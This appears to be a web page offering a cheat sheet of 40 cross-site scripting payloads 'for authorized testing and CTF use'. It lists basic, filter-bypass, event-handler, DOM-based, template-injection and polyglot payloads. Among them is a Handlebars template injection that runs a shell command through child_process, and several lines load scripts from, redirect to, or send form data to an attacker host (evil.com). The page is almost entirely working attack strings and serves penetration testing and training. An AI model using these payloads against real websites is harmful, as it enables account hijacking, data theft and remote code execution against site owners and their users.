Help Ukraine, click for information
xss-payloads

root@sovietghost:~/tools/xss-payloads#

40 XSS payload reference — for authorized testing and CTF use only.

40 payloads

Script tagBasic
<script>alert(1)</script>
Script srcBasic
<script src=//evil.com/x.js></script>
IMG onerrorBasic
<img src=x onerror=alert(1)>
SVG onloadBasic
<svg onload=alert(1)>
Body onloadBasic
<body onload=alert(1)>
Input autofocusBasic
<input autofocus onfocus=alert(1)>
Iframe srcdocBasic
<iframe srcdoc="<script>alert(1)</script>">
Details/summaryBasic
<details open ontoggle=alert(1)>
Case variationFilter Bypass
<ScRiPt>alert(1)</sCrIpT>
Null byteFilter Bypass
<script>alert(1)</script>

null byte between chars

Encoded angleFilter Bypass
%3Cscript%3Ealert(1)%3C/script%3E

URL encoded

HTML entity scriptFilter Bypass
&lt;script&gt;alert(1)&lt;/script&gt;

in unescaped context

Double encodingFilter Bypass
%253Cscript%253Ealert(1)%253C/script%253E
SVG hrefFilter Bypass
<svg><a href="javascript:alert(1)"><text>click</text></a></svg>
FromcharcodeFilter Bypass
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
Backtick templateFilter Bypass
<script>alert`1`</script>
No brackets alertFilter Bypass
<script>onerror=alert;throw 1</script>
Newline in tagFilter Bypass
<img src=x onerror=alert(1)>
onmouseoverEvent Handler
<div onmouseover=alert(1)>hover me</div>
onclickEvent Handler
<button onclick=alert(1)>click me</button>
onkeyupEvent Handler
<input onkeyup=alert(1)>
oncopyEvent Handler
<p oncopy=alert(1)>copy this</p>
onpasteEvent Handler
<input onpaste=alert(1)>
onwheelEvent Handler
<div onwheel=alert(1)>scroll</div>
ondragEvent Handler
<div draggable ondragstart=alert(1)>drag me</div>
Hash-basedDOM-Based
#<script>alert(1)</script>

in URL hash, e.g. document.write(location.hash)

innerHTML sinkDOM-Based
"><img src=x onerror=alert(1)>

breaks out of innerHTML assignment

document.writeDOM-Based
</script><script>alert(1)</script>

breaks script context

javascript: URIDOM-Based
javascript:alert(1)

href/src attribute injection

data: URIDOM-Based
data:text/html,<script>alert(1)</script>
Angular (old)Template Injection
{{constructor.constructor('alert(1)')()}}
Vue.jsTemplate Injection
{{_c.constructor('alert(1)')()}}
React dangerousHTMLTemplate Injection
{"__html":"<img src=x onerror=alert(1)>"}

dangerouslySetInnerHTML value

HandlebarsTemplate Injection
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').exec('id');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}

RCE via SSTI in Handlebars

Gareth Heyes polyglotPolyglot
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>>
XSS polyglot 2Polyglot
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>
Link injectionHTML Injection
<a href="javascript:alert(1)">click</a>
Meta redirectHTML Injection
<meta http-equiv="refresh" content="0; url=https://evil.com">
Base tag hijackHTML Injection
<base href="https://evil.com">

hijacks relative URLs

Form actionHTML Injection
<form action="https://evil.com"><input type=submit>

> Thanks for visiting. Stay curious and stay secure. _